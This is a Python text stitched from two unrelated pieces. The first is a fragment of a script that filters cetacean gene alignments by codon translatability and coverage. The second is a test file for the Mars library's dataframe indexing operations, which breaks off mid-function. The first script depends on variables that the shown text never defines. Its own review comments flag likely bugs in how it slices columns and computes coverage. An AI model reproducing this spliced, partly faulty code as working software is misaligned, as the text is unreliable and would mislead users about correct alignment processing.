coverage_dict = {}
with open("{0}/datadryad/Cetacea_gene_partition.txt".format(f), "r") as gene_partition:
    for line in gene_partition:
        # Partition lines look like "DNA, <name> = <down>-<up>" (1-based).
        name, pos = line.replace("DNA,", "").replace(" ", "").split("=")
        down, up = pos.split("-")
        down, up = int(down), int(up)
        diff = 1 + up - down
        # Skip partitions that are not a whole number of codons.
        if diff % 3 != 0:
            continue
        sequences = phy[:, down - 1:up]
        # Empty (0-column) alignment used as the accumulator.
        output = phy[:, :0]
        filtered = [rec for rec in sequences if rec.id in taxa]
        # NOTE(review): this ``pos`` shadows the partition-range string above.
        for pos in range(0, int(diff / 3)):
            # Keep a codon column only if it translates (allowing "-"/"?"
            # gaps) in every retained taxon.
            keep_site = True
            for sr in filtered:
                site = sr.seq[pos * 3:(pos + 1) * 3]
                try:
                    site.translate(gap="-")
                except TranslationError:
                    try:
                        site.translate(gap="?")
                    except TranslationError:
                        keep_site = False
                        break
            if keep_site:
                # NOTE(review): slices ``phy`` (whole alignment) at the
                # gene-relative position ``pos`` -- presumably this should be
                # ``sequences`` unless down == 1; verify against the data.
                output += phy[:, pos * 3:(pos + 1) * 3]
        seq_size = len(output[0])
        # Drop genes with fewer than 10 retained columns.
        if seq_size < 10:
            continue
        precision_dict[name] = seq_size / diff
        ids_seqs = {fasta.id: str(fasta.seq) for fasta in output if (fasta.id in taxa)}
        seqs_cov = {k: (len(v) - v.count("-") - v.count("?")) / len(v) for k, v in ids_seqs.items()}
        for k, v in seqs_cov.items():
            if v == 0:
                # Drop taxa that are entirely gaps for this gene.
                print("Removing " + k)
                ids_seqs.pop(k)
        # NOTE(review): numerator sums over all taxa (zeros included) while
        # the denominator counts only the retained ones -- confirm intended.
        coverage_dict[name] = sum(seqs_cov.values()) / len(ids_seqs)
        # All retained sequences must have equal length for a valid alignment.
        assert(len(set([len(s) for s in ids_seqs.values()])) == 1)
        ali_file = open("{0}/singlegene_alignments/{1}.ali".format(f, name), 'w')
        ali_file.write("{0} {1}\n".format(len(ids_seqs), seq_size))
        ali_file.write("\n".join([" ".join(k_v) for k_v in ids_seqs.items()]))
        ali_file.close()
        print("{0}: {1:.1f}% acc; {2:.1f}% cov".format(name, precision_dict[name] * 100, coverage_dict[name] * 100))
# Emit CDS lists for each accuracy/coverage threshold combination.
for precision in np.arange(0.9, 1.0, 0.02):
    for coverage in np.arange(0.7, 1.0, 0.05):
        cds = [k for k, v in precision_dict.items() if v >= precision and coverage_dict[k] > coverage]
        print("{0} CDS are with a acc > {1} and coverage > {2}.".format(len(cds), precision, coverage))
        filename = f + "/cds.{0}acc.{1}cov.list".format("{0:.2f}".format(precision).split('.')[1],
                                                        "{0:.2f}".format(coverage).split('.')[1])
        pd.DataFrame(cds).to_csv(filename, index=False, header=None)
        print("{0} CDS saved into '{1}'".format(len(cds), filename))
|
# Copyright 1999-2020 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pandas as pd
import pytest
import mars.dataframe as md
import mars.tensor as mt
from mars.core import tile
from mars.tensor.core import TENSOR_CHUNK_TYPE, TENSOR_TYPE, Tensor
from mars.dataframe.core import SERIES_CHUNK_TYPE, SERIES_TYPE, Series, \
DATAFRAME_TYPE, DataFrame, DATAFRAME_CHUNK_TYPE
from mars.dataframe.indexing.iloc import DataFrameIlocGetItem, DataFrameIlocSetItem, \
IndexingError, HeadTailOptimizedOperandMixin
from mars.dataframe.indexing.loc import DataFrameLocGetItem
def test_set_index():
    """set_index on a chunked DataFrame keeps or drops the column per ``drop``."""
    raw = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
                       index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
    mdf = md.DataFrame(raw, chunk_size=2)

    # drop=True: 'y' leaves the columns entirely.
    dropped = tile(mdf.set_index('y', drop=True))
    assert dropped.chunk_shape == (2, 2)
    pd.testing.assert_index_equal(
        dropped.chunks[0].columns_value.to_pandas(), pd.Index(['x']))
    pd.testing.assert_index_equal(
        dropped.chunks[1].columns_value.to_pandas(), pd.Index(['z']))

    # drop=False: 'y' becomes the index but also stays as a column.
    kept = tile(mdf.set_index('y', drop=False))
    assert kept.chunk_shape == (2, 2)
    pd.testing.assert_index_equal(
        kept.chunks[0].columns_value.to_pandas(), pd.Index(['x', 'y']))
    pd.testing.assert_index_equal(
        kept.chunks[1].columns_value.to_pandas(), pd.Index(['z']))
def test_iloc_getitem():
    """DataFrame/Series ``iloc`` getitem: error cases, then tiling of plain,
    slice and fancy indexes, checking chunk shapes, op indexes (rebased to
    each chunk) and the source chunk each output chunk reads from."""
    df1 = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
                       index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
    df2 = md.DataFrame(df1, chunk_size=2)

    # too many indexers
    with pytest.raises(IndexingError):
        _ = df2.iloc[1, 1, 1]

    # index cannot be tuple
    with pytest.raises(IndexingError):
        _ = df2.iloc[(1,), ]

    # index wrong type
    with pytest.raises(TypeError):
        _ = df2.iloc['a1':]

    with pytest.raises(NotImplementedError):
        _ = df2.iloc[0, md.Series(['a2', 'a3'])]

    # fancy index should be 1-d
    with pytest.raises(ValueError):
        _ = df2.iloc[[[0, 1], [1, 2]]]

    with pytest.raises(ValueError):
        _ = df2.iloc[1, ...]

    # out-of-bounds positions
    with pytest.raises(IndexError):
        _ = df2.iloc[-4]

    with pytest.raises(IndexError):
        _ = df2.iloc[3]

    # plain index -> row extracted as a Series across both column chunks
    df3 = df2.iloc[1]
    df3 = tile(df3)
    assert isinstance(df3, SERIES_TYPE)
    assert isinstance(df3.op, DataFrameIlocGetItem)
    assert df3.shape == (3,)
    assert df3.chunk_shape == (2,)
    assert df3.chunks[0].shape == (2,)
    assert df3.chunks[1].shape == (1,)
    assert df3.chunks[0].op.indexes == [1, slice(None, None, None)]
    assert df3.chunks[1].op.indexes == [1, slice(None, None, None)]
    assert df3.chunks[0].inputs[0].index == (0, 0)
    assert df3.chunks[0].inputs[0].shape == (2, 2)
    assert df3.chunks[1].inputs[0].index == (0, 1)
    assert df3.chunks[1].inputs[0].shape == (2, 1)

    # slice index
    df4 = df2.iloc[:, 2:4]
    df4 = tile(df4)
    assert isinstance(df4, DATAFRAME_TYPE)
    assert isinstance(df4.op, DataFrameIlocGetItem)
    assert df4.shape == (3, 1)
    assert df4.chunk_shape == (2, 1)
    assert df4.chunks[0].shape == (2, 1)
    pd.testing.assert_index_equal(df4.chunks[0].columns_value.to_pandas(), df1.columns[2:3])
    pd.testing.assert_series_equal(df4.chunks[0].dtypes, df1.dtypes[2:3])
    assert isinstance(df4.chunks[0].index_value.to_pandas(), type(df1.index))
    assert df4.chunks[1].shape == (1, 1)
    pd.testing.assert_index_equal(df4.chunks[1].columns_value.to_pandas(), df1.columns[2:3])
    pd.testing.assert_series_equal(df4.chunks[1].dtypes, df1.dtypes[2:3])
    assert df4.chunks[0].index_value.key != df4.chunks[1].index_value.key
    assert isinstance(df4.chunks[1].index_value.to_pandas(), type(df1.index))
    assert df4.chunks[0].op.indexes == [slice(None, None, None), slice(None, None, None)]
    assert df4.chunks[1].op.indexes == [slice(None, None, None), slice(None, None, None)]
    assert df4.chunks[0].inputs[0].index == (0, 1)
    assert df4.chunks[0].inputs[0].shape == (2, 1)
    assert df4.chunks[1].inputs[0].index == (1, 1)
    assert df4.chunks[1].inputs[0].shape == (1, 1)

    # plain fancy index
    df5 = df2.iloc[[0], [0, 1, 2]]
    df5 = tile(df5)
    assert isinstance(df5, DATAFRAME_TYPE)
    assert isinstance(df5.op, DataFrameIlocGetItem)
    assert df5.shape == (1, 3)
    assert df5.chunk_shape == (1, 2)
    assert df5.chunks[0].shape == (1, 2)
    pd.testing.assert_index_equal(df5.chunks[0].columns_value.to_pandas(), df1.columns[:2])
    pd.testing.assert_series_equal(df5.chunks[0].dtypes, df1.dtypes[:2])
    assert isinstance(df5.chunks[0].index_value.to_pandas(), type(df1.index))
    assert df5.chunks[1].shape == (1, 1)
    pd.testing.assert_index_equal(df5.chunks[1].columns_value.to_pandas(), df1.columns[2:])
    pd.testing.assert_series_equal(df5.chunks[1].dtypes, df1.dtypes[2:])
    assert isinstance(df5.chunks[1].index_value.to_pandas(), type(df1.index))
    # fancy indexes are rebased to each chunk's local coordinates
    np.testing.assert_array_equal(df5.chunks[0].op.indexes[0], [0])
    np.testing.assert_array_equal(df5.chunks[0].op.indexes[1], [0, 1])
    np.testing.assert_array_equal(df5.chunks[1].op.indexes[0], [0])
    np.testing.assert_array_equal(df5.chunks[1].op.indexes[1], [0])
    assert df5.chunks[0].inputs[0].index == (0, 0)
    assert df5.chunks[0].inputs[0].shape == (2, 2)
    assert df5.chunks[1].inputs[0].index == (0, 1)
    assert df5.chunks[1].inputs[0].shape == (2, 1)

    # fancy index
    df6 = df2.iloc[[1, 2], [0, 1, 2]]
    df6 = tile(df6)
    assert isinstance(df6, DATAFRAME_TYPE)
    assert isinstance(df6.op, DataFrameIlocGetItem)
    assert df6.shape == (2, 3)
    assert df6.chunk_shape == (2, 2)
    assert df6.chunks[0].shape == (1, 2)
    assert df6.chunks[1].shape == (1, 1)
    assert df6.chunks[2].shape == (1, 2)
    assert df6.chunks[3].shape == (1, 1)
    np.testing.assert_array_equal(df6.chunks[0].op.indexes[0], [1])
    np.testing.assert_array_equal(df6.chunks[0].op.indexes[1], [0, 1])
    np.testing.assert_array_equal(df6.chunks[1].op.indexes[0], [1])
    np.testing.assert_array_equal(df6.chunks[1].op.indexes[1], [0])
    np.testing.assert_array_equal(df6.chunks[2].op.indexes[0], [0])
    np.testing.assert_array_equal(df6.chunks[2].op.indexes[1], [0, 1])
    np.testing.assert_array_equal(df6.chunks[3].op.indexes[0], [0])
    np.testing.assert_array_equal(df6.chunks[3].op.indexes[1], [0])
    assert df6.chunks[0].inputs[0].index == (0, 0)
    assert df6.chunks[0].inputs[0].shape == (2, 2)
    assert df6.chunks[1].inputs[0].index == (0, 1)
    assert df6.chunks[1].inputs[0].shape == (2, 1)
    assert df6.chunks[2].inputs[0].index == (1, 0)
    assert df6.chunks[2].inputs[0].shape == (1, 2)
    assert df6.chunks[3].inputs[0].index == (1, 1)
    assert df6.chunks[3].inputs[0].shape == (1, 1)

    # plain index -> single element comes back as a 0-d tensor
    df7 = df2.iloc[1, 2]
    df7 = tile(df7)
    assert isinstance(df7, TENSOR_TYPE)  # scalar
    assert isinstance(df7.op, DataFrameIlocGetItem)
    assert df7.shape == ()
    assert df7.chunk_shape == ()
    assert df7.chunks[0].dtype == df7.dtype
    assert df7.chunks[0].shape == ()
    assert df7.chunks[0].op.indexes == [1, 0]
    assert df7.chunks[0].inputs[0].index == (0, 1)
    assert df7.chunks[0].inputs[0].shape == (2, 1)

    # test Series iloc getitem

    # slice
    series = md.Series(pd.Series(np.arange(10)), chunk_size=3).iloc[4:8]
    series = tile(series)
    assert series.shape == (4,)
    assert len(series.chunks) == 2
    assert series.chunks[0].shape == (2,)
    assert series.chunks[0].index == (0,)
    assert series.chunks[0].op.indexes == [slice(1, 3, 1),]
    assert series.chunks[1].shape == (2,)
    assert series.chunks[1].op.indexes == [slice(0, 2, 1),]
    assert series.chunks[1].index == (1,)

    # fancy index
    series = md.Series(pd.Series(np.arange(10)), chunk_size=3).iloc[[2, 4, 8]]
    series = tile(series)
    assert series.shape == (3,)
    assert len(series.chunks) == 3
    assert series.chunks[0].shape == (1,)
    assert series.chunks[0].index == (0,)
    assert series.chunks[0].op.indexes[0] == [2]
    assert series.chunks[1].shape == (1,)
    assert series.chunks[1].op.indexes[0] == [1]
    assert series.chunks[1].index == (1,)
    assert series.chunks[2].shape == (1,)
    assert series.chunks[2].op.indexes[0] == [2]
    assert series.chunks[2].index == (2,)
def _assert_iloc_setitem_tiling(src, res):
    """Shared checks for a tiled iloc-setitem result against its tiled source.

    The result's op must be a DataFrameIlocSetItem; its chunk grid and the
    index/columns metadata must mirror the source; and chunk-for-chunk,
    chunks rewritten by the assignment take the matching source chunk as
    input while untouched chunks are passed straight through (same key).
    """
    assert isinstance(res.op, DataFrameIlocSetItem)
    assert res.chunk_shape == src.chunk_shape
    pd.testing.assert_index_equal(src.index_value.to_pandas(), res.index_value.to_pandas())
    pd.testing.assert_index_equal(src.columns_value.to_pandas(), res.columns_value.to_pandas())
    for c1, c2 in zip(src.chunks, res.chunks):
        assert c1.shape == c2.shape
        pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
        pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
        if isinstance(c2.op, DataFrameIlocSetItem):
            assert c1.key == c2.inputs[0].key
        else:
            assert c1.key == c2.key


def test_iloc_setitem():
    """``iloc`` assignment on DataFrame and Series builds correctly tiled
    DataFrameIlocSetItem graphs for plain, slice and fancy indexes.

    The repeated per-case metadata/passthrough checks live in
    ``_assert_iloc_setitem_tiling``; each case then pins the (chunk-local)
    indexes the set-item ops carry.
    """
    df1 = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
                       index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
    df2 = md.DataFrame(df1, chunk_size=2)
    df2 = tile(df2)

    # plain index
    df3 = md.DataFrame(df1, chunk_size=2)
    df3.iloc[1] = 100
    df3 = tile(df3)
    _assert_iloc_setitem_tiling(df2, df3)
    assert df3.chunks[0].op.indexes == [1, slice(None, None, None)]
    assert df3.chunks[1].op.indexes == [1, slice(None, None, None)]

    # slice index
    df4 = md.DataFrame(df1, chunk_size=2)
    df4.iloc[:, 2:4] = 1111
    df4 = tile(df4)
    _assert_iloc_setitem_tiling(df2, df4)
    assert df4.chunks[1].op.indexes == [slice(None, None, None), slice(None, None, None)]
    assert df4.chunks[3].op.indexes == [slice(None, None, None), slice(None, None, None)]

    # plain fancy index
    df5 = md.DataFrame(df1, chunk_size=2)
    df5.iloc[[0], [0, 1, 2]] = 2222
    df5 = tile(df5)
    _assert_iloc_setitem_tiling(df2, df5)
    np.testing.assert_array_equal(df5.chunks[0].op.indexes[0], [0])
    np.testing.assert_array_equal(df5.chunks[0].op.indexes[1], [0, 1])
    np.testing.assert_array_equal(df5.chunks[1].op.indexes[0], [0])
    np.testing.assert_array_equal(df5.chunks[1].op.indexes[1], [0])

    # fancy index
    df6 = md.DataFrame(df1, chunk_size=2)
    df6.iloc[[1, 2], [0, 1, 2]] = 3333
    df6 = tile(df6)
    _assert_iloc_setitem_tiling(df2, df6)
    np.testing.assert_array_equal(df6.chunks[0].op.indexes[0], [1])
    np.testing.assert_array_equal(df6.chunks[0].op.indexes[1], [0, 1])
    np.testing.assert_array_equal(df6.chunks[1].op.indexes[0], [1])
    np.testing.assert_array_equal(df6.chunks[1].op.indexes[1], [0])
    np.testing.assert_array_equal(df6.chunks[2].op.indexes[0], [0])
    np.testing.assert_array_equal(df6.chunks[2].op.indexes[1], [0, 1])
    np.testing.assert_array_equal(df6.chunks[3].op.indexes[0], [0])
    np.testing.assert_array_equal(df6.chunks[3].op.indexes[1], [0])

    # plain index (single element)
    df7 = md.DataFrame(df1, chunk_size=2)
    df7.iloc[1, 2] = 4444
    df7 = tile(df7)
    _assert_iloc_setitem_tiling(df2, df7)
    assert df7.chunks[1].op.indexes == [1, 0]

    # test Series

    # slice
    series = md.Series(pd.Series(np.arange(10)), chunk_size=3)
    series.iloc[:4] = 2
    series = tile(series)
    assert series.shape == (10,)
    assert len(series.chunks) == 4
    assert series.chunks[0].op.indexes == [slice(None, None, None), ]
    assert series.chunks[0].op.value == 2
    assert series.chunks[1].op.indexes == [slice(0, 1, 1), ]
    assert series.chunks[1].op.value == 2

    # fancy index
    series = md.Series(pd.Series(np.arange(10)), chunk_size=3)
    series.iloc[[2, 4, 9]] = 3
    series = tile(series)
    assert series.shape == (10,)
    assert len(series.chunks) == 4
    assert series.chunks[0].index == (0,)
    assert series.chunks[0].op.indexes[0].tolist() == [2]
    assert series.chunks[0].op.value == 3
    assert series.chunks[1].index == (1,)
    assert series.chunks[1].op.indexes[0].tolist() == [1]
    assert series.chunks[1].op.value == 3
    assert series.chunks[3].index == (3,)
    assert series.chunks[3].op.indexes[0].tolist() == [0]
    assert series.chunks[3].op.value == 3
def test_dataframe_loc():
    """Exercise label-based (.loc) indexing on DataFrame/Series: scalar,
    series (both axes), slice, fancy-index, boolean-mask and md.Series
    indexers, plus the error conditions.  Checks shape/dtype/index metadata
    before tiling and chunk metadata after tiling."""
    raw = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
                       index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
    df = md.DataFrame(raw, chunk_size=2)
    raw2 = raw.copy()
    raw2.reset_index(inplace=True, drop=True)
    df3 = md.DataFrame(raw2, chunk_size=2)
    s = pd.Series([1, 3, 5], index=['a1', 'a2', 'a3'])
    series = md.Series(s, chunk_size=2)
    # test return scalar
    df2 = df.loc['a1', 'z']
    assert isinstance(df2, Tensor)
    assert df2.shape == ()
    assert df2.dtype == raw['z'].dtype
    df2 = tile(df2)
    assert len(df2.chunks) == 1
    assert isinstance(df2.chunks[0], TENSOR_CHUNK_TYPE)
    # test return series for index axis
    df2 = df.loc[:, 'y']
    assert isinstance(df2, Series)
    assert df2.shape == (3,)
    pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
    assert df2.name == 'y'
    df2 = tile(df2)
    assert len(df2.chunks) == 2
    for c in df2.chunks:
        assert isinstance(c, SERIES_CHUNK_TYPE)
        assert isinstance(c.index_value.to_pandas(), type(raw.index))
        assert c.name == 'y'
        assert c.dtype == raw['y'].dtype
    # test return series for column axis
    df2 = df.loc['a2', :]
    assert isinstance(df2, Series)
    assert df2.shape == (3,)
    pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.columns_value.to_pandas())
    assert df2.name == 'a2'
    df2 = tile(df2)
    assert len(df2.chunks) == 2
    for c in df2.chunks:
        assert isinstance(c, SERIES_CHUNK_TYPE)
        assert isinstance(c.index_value.to_pandas(), type(raw.columns))
        assert c.name == 'a2'
        assert c.dtype == raw.loc['a2'].dtype
    # test slice
    df2 = df.loc['a2': 'a3', 'y': 'z']
    assert isinstance(df2, DataFrame)
    # row count of a label slice is unknown before execution, hence nan
    assert df2.shape == (np.nan, 2)
    pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
    assert df2.index_value.key != df.index_value.key
    pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.loc[:, 'y': 'z'].columns)
    pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, 'y': 'z'].dtypes)
    # test fancy index on index axis
    df2 = df.loc[['a3', 'a2'], [True, False, True]]
    assert isinstance(df2, DataFrame)
    assert df2.shape == (2, 2)
    pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
    assert df2.index_value.key != df.index_value.key
    pd.testing.assert_index_equal(df2.columns_value.to_pandas(),
                                  raw.loc[:, [True, False, True]].columns)
    pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, [True, False, True]].dtypes)
    # test fancy index which is md.Series on index axis
    df2 = df.loc[md.Series(['a3', 'a2']), [True, False, True]]
    assert isinstance(df2, DataFrame)
    assert df2.shape == (2, 2)
    pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
    assert df2.index_value.key != df.index_value.key
    pd.testing.assert_index_equal(df2.columns_value.to_pandas(),
                                  raw.loc[:, [True, False, True]].columns)
    pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, [True, False, True]].dtypes)
    # test fancy index on columns axis
    df2 = df.loc[[True, False, True], ['z', 'x', 'y']]
    assert isinstance(df2, DataFrame)
    assert df2.shape == (2, 3)
    pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
    assert df2.index_value.key != df.index_value.key
    pd.testing.assert_index_equal(df2.columns_value.to_pandas(),
                                  raw.loc[:, ['z', 'x', 'y']].columns)
    pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, ['z', 'x', 'y']].dtypes)
    df2 = tile(df2)
    assert len(df2.chunks) == 2
    for c in df2.chunks:
        assert isinstance(c, DATAFRAME_CHUNK_TYPE)
        pd.testing.assert_index_equal(c.index_value.to_pandas(), df.index_value.to_pandas())
        assert c.index_value.key != df.index_value.key
        pd.testing.assert_index_equal(c.columns_value.to_pandas(),
                                      raw.loc[:, ['z', 'x', 'y']].columns)
        pd.testing.assert_series_equal(c.dtypes, raw.loc[:, ['z', 'x', 'y']].dtypes)
    df2 = df.loc[md.Series([True, False, True])]
    assert isinstance(df2, DataFrame)
    assert df2.shape == (np.nan, 3)
    pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
    assert df2.index_value.key != df.index_value.key
    pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.columns)
    pd.testing.assert_series_equal(df2.dtypes, raw.dtypes)
    df2 = df3.loc[md.Series([True, False, True])]
    assert isinstance(df2, DataFrame)
    assert df2.shape == (np.nan, 3)
    assert isinstance(df2.index_value.to_pandas(), type(raw.loc[[True, False, True]].index))
    assert df2.index_value.key != df3.index_value.key
    pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.columns)
    pd.testing.assert_series_equal(df2.dtypes, raw.dtypes)
    df2 = df3.loc[md.Series([2, 1])]
    assert isinstance(df2, DataFrame)
    assert df2.shape == (2, 3)
    assert isinstance(df2.index_value.to_pandas(), type(raw2.loc[[2, 1]].index))
    assert df2.index_value.key != df3.index_value.key
    pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.columns)
    pd.testing.assert_series_equal(df2.dtypes, raw.dtypes)
    series2 = series.loc['a2']
    assert isinstance(series2, Tensor)
    assert series2.shape == ()
    assert series2.dtype == s.dtype
    series2 = series.loc[['a2', 'a3']]
    assert isinstance(series2, Series)
    assert series2.shape == (2,)
    assert series2.dtype == s.dtype
    assert series2.name == s.name
    # too many indexers
    with pytest.raises(IndexingError):
        _ = df.loc['a1', 'z', ...]
    # md.Series indexer on the column axis is not supported
    with pytest.raises(NotImplementedError):
        _ = df.loc[:, md.Series([True, False, True])]
    with pytest.raises(KeyError):
        _ = df.loc[:, ['non_exist']]
def test_loc_use_iloc():
    """On a RangeIndex starting at 0, simple positional .loc calls are
    rewritten into the cheaper iloc op; anything that could differ from
    positional semantics (negative labels, non-default RangeIndex, string
    index, column indexers) must stay a LocGetItem."""
    raw = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
                       columns=['x', 'y', 'z'])
    df = md.DataFrame(raw, chunk_size=2)
    assert isinstance(df.loc[:3].op, DataFrameIlocGetItem)
    assert isinstance(df.loc[1:3].op, DataFrameIlocGetItem)
    assert isinstance(df.loc[1].op, DataFrameIlocGetItem)
    # negative
    assert isinstance(df.loc[:-3].op, DataFrameLocGetItem)
    with pytest.raises(KeyError):
        _ = df.loc[-3]
    # index 1 not None
    assert isinstance(df.loc[:3, :'y'].op, DataFrameLocGetItem)
    # index 1 not slice
    assert isinstance(df.loc[:3, [True, False, True]].op, DataFrameLocGetItem)
    assert isinstance(df.loc[[True, False, True]].op, DataFrameLocGetItem)
    raw2 = raw.copy()
    raw2.index = pd.RangeIndex(1, 4)
    df2 = md.DataFrame(raw2, chunk_size=2)
    assert isinstance(df2.loc[:3].op, DataFrameLocGetItem)
    assert isinstance(df2.loc['a3':].op, DataFrameLocGetItem)
    raw2 = raw.copy()
    raw2.index = [f'a{i}' for i in range(3)]
    df2 = md.DataFrame(raw2, chunk_size=2)
    assert isinstance(df2.loc[:3].op, DataFrameLocGetItem)
def test_dataframe_getitem():
    """df[col] returns a Series and df[[cols]] a DataFrame; after tiling,
    chunk shapes/indices must follow the source's chunk layout."""
    data = pd.DataFrame(np.random.rand(10, 5), columns=['c1', 'c2', 'c3', 'c4', 'c5'])
    df = md.DataFrame(data, chunk_size=2)
    series = df['c3']
    assert isinstance(series, Series)
    assert series.shape == (10,)
    assert series.name == 'c3'
    assert series.dtype == data['c3'].dtype
    assert series.index_value == df.index_value
    series = tile(series)
    assert isinstance(series, SERIES_TYPE)
    # tiling must have replaced coarse inputs with tiled ones
    assert all(not i.is_coarse() for i in series.inputs) is True
    assert series.nsplits == ((2, 2, 2, 2, 2),)
    assert len(series.chunks) == 5
    for i, c in enumerate(series.chunks):
        assert isinstance(c, SERIES_CHUNK_TYPE)
        assert c.index == (i,)
        assert c.shape == (2,)
    df1 = df[['c1', 'c2', 'c3']]
    assert isinstance(df1, DataFrame)
    assert df1.shape == (10, 3)
    assert df1.index_value == df.index_value
    pd.testing.assert_index_equal(df1.columns_value.to_pandas(), data[['c1', 'c2', 'c3']].columns)
    pd.testing.assert_series_equal(df1.dtypes, data[['c1', 'c2', 'c3']].dtypes)
    df1 = tile(df1)
    assert df1.nsplits == ((2, 2, 2, 2, 2), (2, 1))
    assert len(df1.chunks) == 10
    # even positions: first column-chunk of each row band (2 columns wide)
    for i, c in enumerate(df1.chunks[slice(0, 10, 2)]):
        assert isinstance(c, DATAFRAME_CHUNK_TYPE)
        assert c.index == (i, 0)
        assert c.shape == (2, 2)
    # odd positions: trailing column-chunk (1 column wide)
    for i, c in enumerate(df1.chunks[slice(1, 10, 2)]):
        assert isinstance(c, DATAFRAME_CHUNK_TYPE)
        assert c.index == (i, 1)
        assert c.shape == (2, 1)
def test_dataframe_getitem_bool():
    """Boolean-mask getitem: result index keys are fresh (rows are filtered)
    but columns are shared unchanged, and identical masks yield identical
    result keys."""
    data = pd.DataFrame(np.random.rand(10, 5),
                        columns=['c1', 'c2', 'c3', 'c4', 'c5'],
                        index=pd.RangeIndex(10, name='i'))
    df = md.DataFrame(data, chunk_size=2)
    mask_data1 = data.c1 > 0.5
    mask_data2 = data.c1 < 0.5
    mask1 = md.Series(mask_data1, chunk_size=2)
    mask2 = md.Series(mask_data2, chunk_size=2)
    r1 = df[mask1]
    r2 = df[mask2]
    r3 = df[mask1]
    assert r1.index_value.key != df.index_value.key
    assert r1.index_value.key != mask1.index_value.key
    assert r1.columns_value.key == df.columns_value.key
    assert r1.columns_value is df.columns_value
    assert r1.index_value.name == 'i'
    # different masks -> different result index keys
    assert r1.index_value.key != r2.index_value.key
    assert r1.columns_value.key == r2.columns_value.key
    assert r1.columns_value is r2.columns_value
    # same mask -> deterministic, equal result index keys
    assert r1.index_value.key == r3.index_value.key
    assert r1.columns_value.key == r3.columns_value.key
    assert r1.columns_value is r3.columns_value
def test_series_getitem():
    """Series getitem by position and by label: scalar access yields a
    0-d tensor chunk; list access records the requested labels per chunk."""
    data = pd.Series(np.random.rand(10, ), name='a')
    series = md.Series(data, chunk_size=3)
    result1 = series[2]
    assert result1.shape == ()
    result1 = tile(result1)
    assert result1.nsplits == ()
    assert len(result1.chunks) == 1
    assert isinstance(result1.chunks[0], TENSOR_CHUNK_TYPE)
    assert result1.chunks[0].shape == ()
    assert result1.chunks[0].dtype == data.dtype
    result2 = series[[4, 5, 1, 2, 3]]
    assert result2.shape == (5,)
    result2 = tile(result2)
    assert result2.nsplits == ((2, 2, 1),)
    assert len(result2.chunks) == 3
    assert result2.chunks[0].op.labels == [4, 5]
    assert result2.chunks[1].op.labels == [1, 2]
    assert result2.chunks[2].op.labels == [3]
    # string-labelled series
    data = pd.Series(np.random.rand(10), index=['i' + str(i) for i in range(10)])
    series = md.Series(data, chunk_size=3)
    result1 = series['i2']
    assert result1.shape == ()
    result1 = tile(result1)
    assert result1.nsplits == ()
    assert result1.chunks[0].dtype == data.dtype
    assert result1.chunks[0].op.labels == 'i2'
    result2 = series[['i2', 'i4']]
    assert result2.shape == (2,)
    result2 = tile(result2)
    assert result2.nsplits == ((2,),)
    assert result2.chunks[0].dtype == data.dtype
    assert result2.chunks[0].op.labels == ['i2', 'i4']
def test_setitem():
    """Adding a column via df['new'] = 1 widens the frame while the input's
    dtypes stay untouched, both before and after tiling."""
    data = pd.DataFrame(np.random.rand(10, 2), columns=['c1', 'c2'])
    df = md.DataFrame(data, chunk_size=4)
    df['new'] = 1
    assert df.shape == (10, 3)
    pd.testing.assert_series_equal(df.inputs[0].dtypes, data.dtypes)
    tiled = tile(df)
    assert tiled.chunks[0].shape == (4, 3)
    pd.testing.assert_series_equal(tiled.inputs[0].dtypes, data.dtypes)
    assert tiled.chunks[1].shape == (4, 3)
    pd.testing.assert_series_equal(tiled.inputs[0].dtypes, data.dtypes)
    assert tiled.chunks[2].shape == (2, 3)
    pd.testing.assert_series_equal(tiled.inputs[0].dtypes, data.dtypes)
    for c in tiled.chunks:
        pd.testing.assert_series_equal(c.inputs[0].dtypes, data.dtypes)
def test_reset_index():
    """reset_index on DataFrame and Series: with/without drop=True, chunk
    index values must become consecutive RangeIndex slices; inplace on a
    Series indexer result raises TypeError."""
    data = pd.DataFrame([('bird', 389.0),
                         ('bird', 24.0),
                         ('mammal', 80.5),
                         ('mammal', np.nan)],
                        index=['falcon', 'parrot', 'lion', 'monkey'],
                        columns=('class', 'max_speed'))
    df = md.DataFrame(data, chunk_size=2).reset_index()
    r = data.reset_index()
    assert df.shape == (4, 3)
    pd.testing.assert_series_equal(df.dtypes, r.dtypes)
    pd.testing.assert_index_equal(df.columns_value.to_pandas(), r.columns)
    df2 = tile(df)
    assert len(df2.chunks) == 2
    assert df2.chunks[0].shape == (2, 3)
